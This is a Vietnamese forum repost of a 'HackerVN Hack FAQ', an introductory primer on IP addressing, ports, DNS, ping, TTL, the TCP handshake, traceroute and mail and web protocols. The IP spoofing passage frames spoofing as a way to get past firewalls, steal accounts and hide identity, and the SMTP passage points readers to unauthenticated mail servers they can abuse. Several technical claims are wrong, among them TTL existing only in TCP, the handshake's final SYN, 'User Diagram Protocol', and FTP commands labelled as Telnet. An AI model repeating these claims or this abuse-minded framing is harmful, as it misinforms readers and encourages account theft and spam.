You are on page 1of 54

fView Full Version : Các vấn đề về Hack, keylogger, phá băng

kudatino
03-08-2005, 01:14 AM
Bài hơi dài,nhưng đưng nên bỏ quá vì rất quan trọng,và đây là bài sưu tầm !!!
HackerVN Hack FAQ :

Lời nói đầu: Thể theo yêu cầu của mọi người, ban điều hành HackerVn đã cho ra đời bản FAQ này
dành cho những bạn mới làm quen với nghệ thuật Hacking và Internet. Bạn có thể tự tìm tòi những
điều căn bản mà bất cứ Hacker nào cũng phải "master". Hy vọng những khái niệm trong bài viết này
sẽ giải đáp được nhiều thắc mắc của một số bạn. Nếu bạn cảm thấy những kiến thức dưới đây không
đúng hoặc thiếu chính xác bạn có thể gửi thư góp ý .
Bản FAQ này dựa trên cơ sở đóng góp, góp ý của các thành viên trên HackerVN community, vậy
nếu bạn có câu hỏi hay giải đáp muốn chúng tôi thêm vào bản FAQ này thì xin liên hệ với địa chỉ e-
mail ở trên hoặc có thể gửi lên trên forum. Để trang trở nên thật sự hữu ích và để giúp HackerVN
tiến lên phía trước chúng tôi thiết tha sự giúp đỡ và đóng góp của bạn. "Một cây làm chẳng nên non,
ba cây chụm lại nên hòn núi cao".
Internet
Địa chỉ IP (IP Address)
(By Conan_Dole and BlackArt)

Trên mạng Internet nó sẽ xác định chính bạn. Khi kết nối vào mạng thì IP của bạn là duy nhất trên
thế giới. Tuy nhiên số này chưa hẳn là cố định. Nếu bạn vào mạng qua một ISP thì số IP của bạn sẽ
thay đổi ở các lần bạn kết nối.
Một người biết IP của bạn thì có thể lần ra vị trí của bạn. Nghĩa là khi có IP thì biết được địa chỉ của
ISP rồi biết được thông tin của bạn. Trên thực tế, IP cho biết về máy tính được sử dụng để vào mạng
chứ không cho biết thông tin về người sử dụng, trừ khi IP của bạn là cố định hoặc sử dụng account
của riêng bạn.
Sự khác nhau giữa logic (hostname) và một địa chỉ IP:
Đơn giản chỉ bởi vì việc gọi tên, ví dụ www.yourname.com sẽ dễ hơn nhiều đối với việc phải gọi
202.32.156.14. Tuy vậy, có một sự khác biệt quan trọng giữa 2 điều này. IP là số để xác định thiết bị
(device) còn hostname là một mối liên kết giữa 1 từ khoá và một số IP. Một địa chỉ IP có thể có
nhiều hostname khác nhau nhưng một hostname thì chỉ có một IP liên kết với nó.
Địa chỉ IP được chia thành 4 số giới hạn từ 0 - 255. Mỗi số được lưu bởi 1 byte -> !P có kicks thước
là 4byte, được chia thành các lớp địa chỉ. Có 3 lớp là A, B, và C. Nếu ở lớp A, ta sẽ có thể có 16 triệu
điạ chỉ, ở lớp B có 65536 địa chỉ. Ví dụ: Ở lớp B với 132.25,chúng ta có tất cả các địa chỉ từ
132.25.0.0 đến 132.25.255.255. Phần lớn các địa chỉ ở lớp A llà sở hữu của các công ty hay của tổ
chức. Một ISP thường sở hữu một vài địa chỉ lớp B hoặc C. Ví dụ: Nếu địa chỉ IP của bạn là
132.25.23.24 thì bạn có thể xác định ISP của bạn là ai. ( có IP là 132.25.x.)

IP thể hiện điều gì: Trên mạng Internet nó sẽ xác định chính bạn. Khi kết nối vào mạng thì IP của
bạn là duy nhất trên thế giới. Tuy nhiên số này chưa hẳn là cố định. Nếu bạn vào mạng qua một ISP
thì số IP của bạn sẽ thay đổi ở các lần bạn kết nối.
Một người biết IP của bạn thì có thể lần ra vị trí của bạn. Nghĩa là khi có IP thì biết được địa chỉ của
ISP rồi biết được thông tin của bạn. Trên thực tế, IP cho biết về máy tính được sử dụng để vào mạng
chứ không cho biết thông tin về người sử dụng, trừ khi IP của bạn là cố định hoặc sử dụng account
của riêng bạn.

Sự khác nhau giữa logic (hostname) và một địa chỉ IP:

Đơn giản chỉ bởi vì việc gọi tên, ví dụ http://www.yourname.com/ sẽ dễ hơn nhiều đối với việc phải
gọi 202.32.156.14. Tuy vậy, có một sự khác biệt quan trọng giữa 2 điều này. IP là số để xác định
thiết bị (device) còn hostname là một mối liên kết giữa 1 từ khoá và một số IP. Một địa chỉ IP có thể
có nhiều hostname khác nhau nhưng một hostname thì chỉ có một IP liên kết với nó.

IP spoofing là: Một số IP có mục đích để xác định một thiết bị duy nhất trên thế giới. Vì vậy trên
mạng một máy chủ có thể cho phép một thiết bị khác trao đổi dữ liệu qua lại mà không cần kiểm tra
máy chủ.
Tuy nhiên có thể thay đổi IP của bạn, nghĩa là bạn có thể gởi một thông tin giả đến một máy khác mà
máy đó sẽ tin rằng thông tin nhận được xuất phát từ một máy nào đó (tất nhiên là không phải máy
của bạn). Bạn có thể vượt qua máy chủ mà không cần phải có quyền điều khiến máy chủ đó. Điều
trở ngại là ở chỗ những thông tin phản hồi từ máy chủ sẽ được gởi đến thiết bị có IP mà chúng ta đã
giả mạo. Vì vậy có thể bạn sẽ không có được sự phản hồi những thông tin mà mình mong muốn. Có
lẽ điều duy nhất mà spoof IP có hiệu quả là khi bạn cần vượt qua firewall, trộm account và cần dấu
thông tin cá nhân!

Cổng ảo là gì? (Virtual Port)

Cổng ảo là 1 số tự nhiên đựợc gói ở trong TCP(Tranmission Control Protocol) và UDP(User


Diagram Protocol) header (hiện có lẽ bạn còn xa lạ với 2 từ này, chúng tôi sẽ đề cập sau). Như mọi
nguòi đã biết, Windows có thể chạy nhiều chương trình 1 lúc, mỗi chương trình này có 1 cổng riêng
dùng để truyền và nhận dữ liệu. Ví dụ 1 máy có địa chỉ IP là 127.0.0.1 chạy WebServer, FTP_Server,
POP3 server, etc, những dịch vụ này đều đuọc chạy trên 1 IP address là 127.0.0.1, khi một gói tin
đuọc gửi đến làm thế nào máy tính của chúng ta phân biệt được gói tin này đi vào dịch vụ nào
WebServer hay FTP server hay SMTP? Chính vì thế Port xuất hiện. Mỗi dịch vụ có 1 số port mặc
định, ví dụ FTP có port mặc định là 21, web service có port mặc định là 80, POP3 là 110, SMTP là
25 vân vân.... Người quản trị mạng có thể thay đổi số port mặc định này, nếu bạn ko biết số port trên
một máy chủ, bạn ko thể kết nối vào dịch vụ đó được. Chắc bạn đã từng nghe nói đến PORT
MAPPING nhưng có lẽ chưa biết nó là gì và chức năng thế nào. Port mapping thực ra đơn giản chỉ
là quá trình chuyển đổi số port mặc định của một dịch vụ nào đó đến 1 số khác. Ví dụ Port mặc định
của WebServer là 80, nhưng thỉnh thoảng có lẽ bạn vẫn thấy http://www.xxx.com:8080/ , 8080 ở đây
chính là số port của host xxx nhưng đã đuợc nguòi quản trị của host này "map" từ 80 thành 8080.

RFC là gì?: RFC là viết tắt của Request For Comment, là tập hợp những tài liệu về kiến nghị, đề
xuất và những lời bình luận liên quan trực tiếp hoặc gián tiếp đến công nghệ, nghi thức mạng
INTERNET. Các tài liệu RFC đựợc chỉnh sửa, thay đổi đến khi tất cả các kỹ sư thành viên của
IETF(Internet Engineering Task Force) đồng ý và duyệt, sau đó những tài liệu này được xuất bản và
được công nhận là 1 chuẩn, nghi thức cho Internet. Tài liệu RFC nổi tiếng và làm tạo được tiếng
vang lớn nhất là tài liệu RFC số 822 về Internet Email bởi Dave Crocker.
Trang chủ của RFC: http://www.ietf.org/rfc.html

DNS là gì? Tại sao ta lại dùng DNS, DNS làm việc ra sao, tên miền là gì, etc...?: DNS là viết tắt của
Domain Name System. Một máy chủ DNS đợi kết nối ở cổng số 53, có nghĩa là nếu bạn muốn kết
nối vào máy chủ đó, bạn phải kết nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các
chữ cái thành các chữ số tương ứng và ngược lại. Ví dụ: 127.0.0.1 --> localhost và localhost---
>127.0.0.1
Hệ thống "tên đến địa chỉ" (name-to-address) được dùng trước đây khi DNS chưa ra đời, đây thực
chất là 1 file trên server. Cấu tạo của 1 file này là 1 table với "hostname" và địa chỉ IP tương ứng, file
này được cập nhật và bảo quản bởi Standford Reserch Institute Network Information Center (SRI-
NIC). Vài lần 1 tuần, tổ chức này lại cập nhật nội dung file này. Những nguòi quản trị mạng nếu cần
sẽ download file này xuống để dùng cho local DNS. Dần dần, số lượng của các trang web trên
internet ngày càng nhiều. Cách cũ dùng "name-to-address" trở nên thiếu hiệu quả và tốn thời gian --
> DNS ra đời. DNS ko phụ thuộc vào bất cứ 1 server riêng rẽ nào, DNS được phân phát cho nguòi
dùng dưới dạng 1 file cơ sở dữ liệu, file này được giũ trên khắp các DNS server trên toàn thế giới.
Mỗi DNS server đều tự tìm kiếm một DNS cao hơn khi nhân được yêu cầu về 1 host nào đó ko có
trong cơ sở dữ liệu trên máy mình
Máy chủ DNS (DNS Server)
DNS server là 1 máy tính bình thường có thể PC(/MAC) chạy UNIX hoặc nhân bản của Unix
(Linux,etc..) và chay một chương trình quản lý domain name gọi là BIND (Berkely Internet Name
Domain). DNS server có thể chạy các hệ điều hành khác như Windows, MacOS nhưng thường thì
*nix hay được chọn hơn cả vì unix có tính bảo mật cao hơn và cho phép lượng truy cập lớn hơn.
Chương trình quản lý DNS được thiết kế chia làm 2 phần, phần thứ nhất là 1 "daemon" nghe ở cổng
53 đợi kết nối. Phần thứ 2 là để gửi yêu cầu lên một DNS cao hơn nếu local database ko có thông tin
mà máy khách yêu cầu. Phần thứ nhất (daemon) trả lời trình duyệt web mỗi khi nhận được yêu cầu.
Ví dụ, khi bạn mở Internet Explorer và đánh vào http://www.hackervn.org,/ trình duyệt của bạn sẽ
gửi yêu cầu đến 1 máy chủ có dịch vụ DNS gần nhất để tìm IP của http://www.hackervn.org/ vì trình
duyệt của bạn cần biết IP máy chủ hiện đang lưu trữ trang web http://www.hackervn.org./ Máy chủ
DNS ở ISP của bạn sẽ tìm trong cơ sở dữ liệu, nếu ko tìm thấy địa chỉ IP cho
http://www.hackervn.org/ máy chủ chạy DNS này sẽ chuyển sang phần thứ 2 là đưa yêu cầu của máy
khách đến 1 máy chủ DNS cao cấp hơn, nhiều dữ liệu hơn để giải quyết.
Định dạng cây của DNS (tree formation)
Một khi DNS server ko thể tìm thấy số IP tương ứng cho 1 hostname trong cơ sở dữ liệu của mình,
server đó sẽ gửi yêu cầu đến 1 DNS server khác cao hơn 1 bậc, và DNS server này sẽ lặp lại quá
trinh mà DNS server dưới đã làm để tìm địa chỉ IP của 1 host nào đó. Nếu DNS server này vẫn ko
tìm thấy thì yêu cầu sẽ lại được gửi đến 1 DNS server khác cao hơn nữa và quy trình này sẽ được
tiếp tục cho đến khi nào ra kết quả. Kết quả của yêu cầu này chỉ có thể là "Tìm Thấy" hoặc "Ko tìm
thấy". :-) . Đến thời điểm này, chắc bạn đã hình dung ra được cấu trúc của các DNS server như thế
nào rồi? Nếu chưa, hãy nhìn vào ví dụ dưới đây:
Ví dụ nhà cung cấp internet của bạn là FPT. Trang web đặt trên máy chủ của FPT là
http://www.fpt.vn./ Mặc định, DNS server sẽ là dns.fpt.vn. Bây giờ bạn muốn truy cập
http://www.hackervn.org./ dns.fpt.vn sẽ tìm thông tin về host này ở trong cơ sở dữ liệu trên máy chủ
DNS ở FPT xem ai đó đã gửi thông tin truy cập về host này chưa. Nếu điạ chỉ hackervn ko được tìm
thấy ở "local database" hoặc trong bộ nhớ, dns.fpt.vn sẽ đưa yêu cầu này đến 1 DNS server cao cấp
hơn, ở đây sẽ là "dns.vn". DNS server này quản lý tất cả các trang có đuôi .vn. Tuy nhiên server này
có thể ko có địa chỉ này trong cơ sở dữ liệu nhưng có thể có vì có thể ai đó đã truy cập trang này.
Nếu ở đây vẫn ko tìm thấy host/ip cần tìm, DNS server này cuối cùng phải gửi request đến DNS
server lớn nhất quản lý tất cả các domain gọi là ".root". Máy chủ chạy .root DNS này là một máy
tính rất mạnh, và cơ sở dữ liệu của .root này bao gồm tất cả các loại domain trên toàn thế giới. như
.com , .net , .mil, .co.uk, vân vân.....

Khi nào và tại sao DNS bị "bại liệt" ?: Kết quả tìm kiếm 1 trang web có thể lâu hay nhanh tuỳ thuộc
vào nhà cung cấp dịch vụ internet của bạn có điạ chỉ IP và host đó ko trong cơ sở dữ liệu ở trên máy
chủ DNS hay không. Nếu nhà cung cấp dịch vụ Internet có sẵn thông tin bạn cần trong "local DNS
database" có lẽ chỉ vài giây là bạn có thể có thể xem đựoc trang web còn nếu ko thì sẽ mất 1 khoảng
thời gian lâu hơn, tồi tệ nhất là khi bạn nhận đựợc thông báo "Page can not be displayed", có nghĩa
là 1 là trang web đó ko tồn tại hoặc là do quá trình "yêu cầu" DNS quá lâu nên browser của bạn
"time out" và "giết chết" kết nối. Tuy nhiên bạn có thể Refresh lại trình duyệt, nếu lần trước là do
"time out" thì lần này bạn sẽ nhận đựoc trang web đó nhanh hơn vì máy chủ DNS của nhà cung cấp
dịch vụ Internet của bạn đã cập nhật đựoc trang đó trong lần yêu cầu trước khi bạn gửi đến.

Khái niệm về Ping và cách hoạt động?: Ping là 1 khái niệm rât đơn giản tuy nhiên rất hữu ích cho
việc chẩn đoán mạng. Tiểu sử của từ "ping" như sau: Ping là tiếng động vang ra khi 1 tàu ngầm
muốn biết có 1 vật thể khác ở gần mình hay ko, nếu có 1 vật thể nào đó gần tàu ngầm tiếng sóng âm
này sẽ va vào vật thể đó và tiếng vang lại sẽ là "pong" vậy thì tàu ngầm đó sẽ biết là có gì gần mình.
Trên Internet, khái niệm Ping cũng rất giống với tiểu sử của nó như đã đề cập ở trên. Lệnh Ping gửi
một gói ICMP (Internet Control Message Protocol) đến host, nếu host đó "pong" lại có nghĩa là host
đó tồn tại (hoặc là có thể với tới đựoc). Ping cũng có thể giúp chúng ta biêt được luợng thời gian một
gói tin (data packet) đi từ máy tính của mình đến 1 host nào đó.
Có 1 loại dịch vụ Ping khác gọi là "TCP Ping" và "UDP Ping". Hai dịch vụ này đều đợi kết nối ở
cổng số 9 và ghi lại những gì bạn đánh trên màn hình. Dịch vụ này được sử dụng khi nguời quản trị
mạng ko muốn máy chủ của mình nhận những gói tin ICMP( để tránh Denial Of Service ) nhưng vẫn
muốn để mọi nguòi ping để xem máy chủ của mình "chết" hay "sống".

Số thứ tự (Sequence numbers) là gì?: "Sequence number" là những số xuất hiện trong phần "header"
của 1 gói tin TCP. Mục đích của "sequence number" là để các gói tin được nhận theo đúng trình tự
như khi chúng được gửi đi. Một trong những phiền toái trong việc truyền dữ liệu qua mạng Internet
nói chung và Intranet nói riêng là sự chuyển đổi các gói tin (Packet Switching). Nôm na là như sau,
mỗi gói tin đi mỗi con đường khác nhau để tới địa chỉ của host. Gói tin A đi đừong này nhưng gói tin
B có khi lai đi đường khác. TCP/IP được thiết kế sao cho mỗi gói tin TCP tìm con đường nào nhanh
nhât để đến được đia chỉ đích nhưng con đường này thường là đồng nhất(Với TCP). Gói tin gửi đi
phụ thuộc vào tốc độ của đường truyền mà nó đi qua nên những gói tin này ko thể đến nơi cùng 1
lúc, có gói sẽ đến trước có gói sẽ đến sau. Ví dụ gói thứ nhất sẽ đến sau gói thứ 10 chẳng hạn.
Để chắc chắn là máy đích nhận đựoc các gói tin theo trình tự để sau này lắp lại thành 1 file hoàn
chỉnh, mỗi gói tin TCP "header" bao gồm 1 số thứ tự (sequence number). Nếu ko có số thứ tự này thì
máy đích sẽ gần như ko thể lắp ráp các gói tin lại thành một file hoàn chỉnh được, nhất là đối với
những file to vài trăm Megabyte.
"Thời Gian Để Sống" (Time To Live)
Như bạn đã biết (có thể ko biết), Internet là một mạng rất rộng lớn. Để đảm bảo các gói dữ liệu đến
được máy đích thì quả là một vấn đề. Nếu các gói dữ liệu này đến được chỗ cần đến thì khỏi phải
nói, nhưng nếu những gói tin này bị lạc trên đường thì sao?Chính vì thế "Time To Live" ra đời. Khi
những gói tin này ko đến được máy đích sau khi đã đi qua số một số router(số này đã được mặc đính
trước) sẽ tự phân huỷ.
"Time To Live" chỉ tồn tại trong gói tin TCP. Đây là 1 cách để thủ tục TCP bảo đảm gói tin được gửi
đi đến đúng địa chỉ, và để người nhận biết là gói tin vừa gửi đi đã bị mất hoặc thất lạc nếu có gì xảy
ra, như vậy gói tin đó sẽ được gửi lại. Time To Live là 1 số tự nhiên, mỗi khi gói tin TCP đi qua 1
router, con số này sẽ giảm đi 1 giá trị, khi số này giảm xuống còn 0, gói tin sẽ tự tiêu huỷ và thông
báo ICMP được gửi về thông báo là gói tin vừa gửi ko đến đuợc để máy này gửi lại gói tin vừa thất
lạc.
Hầu hết các máy đều để giá trị của gói tin TCP là 32. Các chuyên gia về mạng đưa ra lời khuyên là
nên để giá trị mặc định TTL là 64, một số khác lại cho là 128 nhưng 128 có vẻ là hơi nhiều.

Thế nào là kết nối TCP 3 chiều ( 3 way TCP hand-shake): TCP là nghi thức kết nối trước, truyền tải
dữ liệu sau. Cụ thể là nếu bạn muốn truyền dữ liệu giữa 2 máy tính nối mạng, trước tiên bạn phải
thiết lập một số giao thức giữa 2 máy với nhau để báo cho nhau là đã chuẩn bị cho việc gửi và nhận
dữ liệu hay chưa. Quá trình này gọi là kết nối 3 chiều của TCP (TCP 3 ways hand-shake)
Để có thể giúp bạn hiểu rõ ràng hơn về vấn đề này, chúng tôi xin đưa ra ví dụ minh hoạ sau. Chẳng
hạn máy tính A muốn thiết lập kết nối TCP đến máy tính B, trước tiên máy tính A sẽ phải gửi 1 gói
tin gọi là gói tin với header được đánh dấu SYN (với 1 bit ở TCP header là on) đến B. Gói tin SYN
này bao gồm số thứ tự (sequence number). Khi B nhận đuợc gói tin có dấu SYN này từ A, máy B sẽ
gửi một gói tin SYN của chính nó và 1 gói tin khác nữa gọi là ACK. Gói tin ACK này thực chất là
một gói tin tương tự như SYN nhưng chứa dữ liệu của gói tin SYN mà A gửi cho máy B lúc đầu.
Cuối cùng, máy A gửi một gói tin SYN cuối cùng lại cho B như là ở buớc thứ 2 khi B trả lời cho A.
(SYN) A -----> B Khi quá trình này hoàn tất, 2 máy tính có thể thiết
lập kết nối và truyền tải dữ liệu cho nhau duới dạng
TCP

(SYN)+(ACK)A <----- B
(ACK) A -----> B

Chú ý: Truyền tải dữ liệu duới nghi thức UDP thì ko cần phải thiết lập kết nối trước giống trong
TCP. Những gói tin TCP thường đi cùng một đuờng, qua cùng router tuy nhiên đối với UDP thì do
ko thiết lập một kết nối nào cả giữa 2 máy nên mỗi gói tin đều tự tìm các đuờng khác nhau để đến
máy đích, ko có một còn đuờng nào thống nhất cả.

Khái niệm về "timeout" ? "Time out" đựoc dùng để miêu tả khoảng thời gian máy A gửi 1 gói tin cho
máy B nhưng ko nhân đuợc trả lời từ máy B. Ví dụ khi bạn kết nối vào 1 server chat nào đó chẳng
hạn như việtchat, bạn click vào nút connect nhưng sau khoảng 1 phút vietchat server vẫn chưa trả
lời. Đây gọi là time out.

Khái Niệm tracert (traceroute) và cách làm việc? Traceroute: là một công cụ để chuẩn đoán mạng rất
tốt. Tiện ích này có sẵn ở trong windows(tracert) hoặc unix(traceroute). Tracert dùng TTL(Time To
Live) để phát hiện đường đi của gói tin và sau đó ping các router mà gói tin này đã đi qua. Tiện ích
này thực sự hữu ích khi bạn muốn kết nối đến một máy chủ nhưng bạn ko tài nào đến đuợc và bạn
muốn xem là những router nào trên đuờng mà gói tin này đã đi cản trở giao thông mạng
Đầu tiên, lệnh tracert gửi một gói tin với giá trị TTL là 1. Gói tín với giá trị TTL = 1 này sẽ bị tiêu
huỷ ngay sau khi nó bước qua router đầu tiên, thông báo lỗi sẽ đuợc gửi trả về máy của bạn. Sau đó
lại một gói tin TCP khác được gửi đi nhưng lần này với giá trị TTL=2. Như các bạn đã biết, khi đến
router thứ 2 gói tin này sẽ bị "chết" và thông báo lỗi sẽ đuợc gửi về máy bạn và cứ thế. Sau khi đã
hoàn thành cả một đoạn đường dài qua tất cả các router mà gói tin cần đi qua, tracert dùng lệnh ping
các router trên đường để xem những router nào đã trả lời và mất số lượng thời gian là bao lâu. Như
vậy, người dùng có thể tự xem router nào nhanh, router nào cho gói tin đi qua ...vân vân.. Có thể là
do chậm hoặc là bị down.

Chú ý:
Trong windows: tracert hostname
Trong unix: traceroute hostname

Khái niệm về HTTP và cách hoạt động: HTTP là viết tắt của cụm từ tiếng anh Hyper Text Transfer
Protocol. Đây là một nghi thức dùng cho trình duyệt web (Opera, Internet Explorer....) để giao tiếp
với máy chủ Web và hiển thị thông tin. Khi bạn gõ địa chỉ của 1 web-site nào đó vào hộp địa chỉ
trong trình duyệt Web và gõ "Enter", việc đầu tiên trình duyệt của bạn sẽ làm là tìm ở máy chủ DNS
xem địa chỉ IP của máy chủ chứa trang đó là gì. Sau khi đã tìm thấy địa chỉ IP, trình duyệt web của
bạn sẽ tìm cách để kết nối vào cổng (port) mà máy chủ đó dùng cho http(cổng mặc định là 80) và lấy
thông tin mà bạn cần hiển thị(ở đây là trang web).
Tip: Bạn có thể chỉnh sửa file host(c:\windows\host) trong win 98 hoặc
c:\windows\System32\driver\host để ghi lại những server mà bạn hay truy cập. Như vậy thì sẽ tiết
kiêm đuợc nhiều thời gian để tìm IP trên DNS server.

Dưới đây là 2 lệnh căn bản bạn nên biết:

1) "get"...Đây là lệnh trình duyệt dùng để lấy 1 trang web nào đó mà bạn đang yêu cầu. Ví dụ get url
HTTP/1.0. url là địa chỉ trang web còn HTTP/1.x là version của dịch vụ HTTP mà trình duyệt của
bạn dùng.
2) "post"... Đây là lệnh trình duyệt dùng để gửi 1 file lên trên server.
FTP là gì và cách làm việc

FTP là viết tắt của cụm từ tiếng anh File Transfer Protocol. Đây là nghi thức dùng để truyền tải dữ
liệu từ máy này sang máy khác. Điểm lợi của FTP là tính dễ sử dụng, bạn có thể dễ dàng kết nối vào
1 máy chủ FTP và tìm những file bạn muốn miến là những file đó là cho public. Hiện nay trên thế
giới có rất nhiều tiện ích FTP dễ dùng như CuteFTP etc...

Chú ý: Bạn có để ý rằng tất cả các nghi thức liên quan đến Internet mà chúng ta đã tìm hiểu trong
bản FAQ đều kêt thúc bằng từ P (protocol). Và như bạn thấy, thủ tục nào cũng đều liên quan đến việc
truyền tải file (upload và download).

Các lệnh và cách sử dụng Telnet


Lệnh
cd ...chuyển thư mục ls hoặc dir ...list các file trong thư mục hiện thời
get ...download file xuống máy bạn
ls ...list file (Unix)
cdup ...chuyển đến thư mục mẹ
put ...upload file lênt máy chủ ở thư mục hiên thời
quit .....ngắt kết nối và thoát
help list các lệnh.

SMTP là gì và cách hoạt động. SMTP: là viết tắt của Simple Message Transfer Protocol. SMTP là
một nghi thức của Internet dùng để gửi thư. Khi dùng SMTP để gửi thư, bạn thường phải dùng một
chương trình Sendmail(Sendmail Deamon). Có thủ tục khác gọi là QMail nhưng thường thường
Sendmail vẫn phổ biến hơn cả mặc dù Sendmaili là một nghi thức gửi thư rất ko an toàn.
Chương trình sendmail có cổng mặc định là 25, cổng này mở để đợi máy khách kết nối vào để gửi
thư. SMTP có thể bị kẻ xấu lợi dụng để dùng vào mục đích ko tốt vì SMTP ko dùng hệ thống kiểm
tra người dùng. Bạn chỉ cần kết nối vào server và đưa ra địa chỉ nội dung thư là thư đó đựoc gửi đi
ko cần biết bạn là ai. Hiện trên thế giới có rất nhiều SMTP server, bạn có thể dùng google để tìm
những server này.
Tuy nhiên bạn vẫn có thể khám phá ra bức thư bạn nhận được là thật hay giả bằng cách chỉ cần nhìn
vào header của thư đó.

Pop 3 là gì và cách hoạt động: Pop 3 là viết tắt của Post Office Protocol, số 3 là số phiên bản mới
hơn của POP. Đơn giản nghi thức này dùng để nhận thư từ POP3 server.
Khi kết nối để nhận thư bằng Outlook, Eudora hay các chương trình e-mail khác để gửi thư, trước
tiên chuơng trình sẽ kết nối đến POP3 server, server này thuờng đợi kết nối ở cổng mặc định là 110.
Bạn nên chú ý là POP3 email khác với Web email, đối với POP3 bạn có thể telnet vào server để
check thư trong khi với Webmail thì bạn phải vào hẳn trang web để check(ví dụ Hotmail). Web email
thường là chậm hơn so với POP3 email.
POP3 là một nghi thức dễ học nhất trong các nghi thức, đôi khi kiến thức POP3 có thể có lúc hữu
dụng. Ví dụ khi bạn bị bomb-mail chẳng hạn, bạn có thể telnet vào POP3 server và xoá những bomb
thư đó đi mà ko phải tải chúng xuống máy bạn.

Khái Niệm Cơ Bản về Mạng Nhện Toàn Cầu


World Wide Web

Nhân loại từ ngàn xưa đã tìm và phát minh mọi cách để thông tin liên lạc với nhau. Việc vận chuyển
tin tức từ một nơi này tới một nơi khác thật là cần thiết và cần phải có trong bất cứ một xã hội nào.
Phương cách thông tin liên lạc rất đa dạng và phong phú. Những phương cách thô sơ đơn giản như
phương cách truyền miệng, dán những bản thông báo, cáo thị, mang tin đến những nơi khác bằng
cách đi bộ, ngựa, chim bồ câu, thuyền bè. Nhân loại đã cải tiến phương cách thông tin liên lạc ngày
càng nhanh ***ng và với số lượng tin tức nhiều hơn bội phần. Những phát minh về phương cách
truyền thanh như máy radio, điện thoại và truyền hình như máy TV (television), vận chuyển thư từ
bằng máy bay, gửi thư bằng điện tín v.v. đã giúp cho việc thông tin liên lạc rất hữu hiệu và nhanh
***ng.

Sự phát minh ra máy vi tính và sự hình thành của Mạng Lưới Thông Tin Toàn Cầu (Internet) đã mở
ra một kỹ nguyên mới cho việc thông tin liên lạc. Từ một máy vi tính móc nối vào Mạng Lưới
Thông Tin Toàn Cầu (MLTTTC) người sử dụng có thể gửi và nhận tin tức từ khắp nơi trên thế giới
với khối lượng tin tức khổng lồ và thời gian tối thiểu. Trong thời gian vài năm gần đây chúng ta đang
chứng kiến một sự kiện có thể gọi là một cuộc cách mạng đổi mới trên Mạng Lưới Thông Tin Toàn
Cầu. Việc thay đổi to lớn này là việc thành lập của Mạng Nhện Toàn Cầu (WWW).
Cấu Tạo của Mạng Nhện Toàn Cầu (WWW)

Mạng Nhện Toàn Cầu là gì? Mạng Nhện Toàn Cầu được tạm dịch từ World Wide Web (thường được
viết tắc là WWW) là một hệ thống cung cấp tin tức móc nối lại với nhau bằng các máy vi tính trải
rộng trên khắp thế giới dựa trên Mạng Lưới Thông Tin Toàn Cầu. Nhờ vào Mạng Nhện Toàn Cầu
người sử dụng có thể tìm kiếm những tin tức hoặc tài liệu hữu ích để học hỏi, tham khảo, nghiên cứu
một cách thật là nhanh ***ng. Sự lớn mạnh và phổ biến sâu rộng của MNTC một phần lớn là nhờ
vào sự dễ dàng sử dụng và rẻ tiền của nó. Khi móc nối vào MNTC người sử dụng sẽ có cảm giác là
mình đang đi vào một thư viện khổng lồ trong đó có chứa đựng tất cả những gì mình muốn biết và
muốn đọc về bất cứ đề tài gì.

Một sự kiện quan trọng khác của Mạnh Nhện Toàn Cầu là nó có khả năng di chuyển tài liệu cùng với
hình ảnh và âm thanh. Có thể nói Mạng Nhện Toàn Cầu cung cấp cho người sử dụng hầu hết những
nhu cầu cần thiết trên Mạng Lưới Thông Tin Toàn Cầu như là telnet, ftp, Archie, Gopher,
Multimedia.

Mạng Nhện Toàn Cầu được bành trướng nhanh ***ng là do sự liên kết (link) chặt chẻ và dễ dàng
của các máy phục vụ Mạng Nhện (Web Servers). Các máy này sử dụng nghi thức HyperText
Transfer Protocol (HTTP) được tạm dịch là Nghi Thức Chuyển Tải Lộ Ngữ để di chuyển tài liệu.
Chúng ta cũng nên biết rằng Nghi Thức Chuyển Tải Lộ Ngữ được hổ trợ bởi Nghi Thức TCP/IP là
một nghi thức căn bản và chắc chắn trong Hệ Thống Thông Tin Toàn Cầu.
Nhu Liệu Quan Sát Mạng Nhện (Web Browser)

Thật khó mà dùng lời lẽ để nói hết những điều hay và phong phú của Mạng Nhện Toàn Cầu. Điều tốt
nhất để cho mọi người hiểu và thấy cái giá trị của Mạng Nhện Toàn Cầu là sử dụng nó. Sự tham gia
vào Mạng Nhện Toàn Cầu không quá khó khăn như chúng ta tưởng mà chỉ cần một máy vi tính được
móc nối vào Mạng Lưới Thông Tin Toàn Cầu (Internet) và nhu liệu Quan Sát Mạng Nhện (Web
Browser). Vì sự ứng dụng quan trọng của MNTC cho nên liệu Quan Sát Mạng Nhện đã được hoàn
thành trên nhiều Hệ Thống Điều Khiển (Operating System) khác nhau thí dụ như DOS, OS/2, Unix,
Mac, VM, CMS v.v. Ngoài ra những công ty thương mãi cung cấp dịch vụ Internet cũng thành lập
nhu liệu Quan Sát Mạng Nhện riêng để phục vụ khách hàng của họ. Vài nhu liệu Quan Sát Mạng
Nhện rất được phổ biến như Mosaic, Netscape, Cello, Web Explorer v.v.
Sử Dụng nhu liệu Quan Sát Mạng Nhện

Móc nối tới máy phục vụ Mạng Nhện

Khi người sử dụng dùng nhu liệu Quan Sát Mạng Nhện để tìm tin tức thì trước nhất nhu liệu này sẽ
móc nối vào một Trang Gốc (Homepage) của một máy phục vụ Mạng Nhện đã được bố trí sẵn hoặc
người sử dụng có thể móc nối thẳng tới Trang Gốc của một máy phục vụ Mạng Nhện khác bằng
cách dùng Universal Resource Locator (URL) được tạm dịch là Phương Pháp Tìm Tin Đồng Nhất.
Xin chú ý là trong các tài liệu sách vở khác nhau, URL còn được định nghĩa là Unified Resource
Locator hoặc Uniform Resource Locator. Hầu hết những hãng xưỡng, trường học, cơ quan, hội đoàn
nào có móc nối vào Mạng Lưới Thông Tin Toàn Cầu đều có một hoặc nhiều máy phục vụ Mạng
Nhện. Cách thức móc nối tới những máy phục vụ Mạng Nhện như sau:
• http://host/path
host tức là tên của máy phục vụ Mạng Nhện và path là nơi Trang tài liệu người sử dụng muốn coi.
Thí dụ:
• http://www.vnet.org
hoặc là
• http://www.vn.net
Sau đây là địa chỉ URL của vài trạm phục vụ Mạng Nhện quan trọng:
• http://info.cern.ch
• http://www.ncsa.uiuc.edu

Chĩ dẫn: Thông thường các hãng xưỡng hoặc cơ quan trường học lớn đều có trạm phục vụ Mạng
Nhện. Địa chỉ URL thường được bắt đầu bằng chữ www và tên vùng của địa chỉ điện thư (domain
name). Thí dụ như hãng IBM có tên vùng trong địa chỉ điện thư là ibm.com. Như vậy nếu ghép với
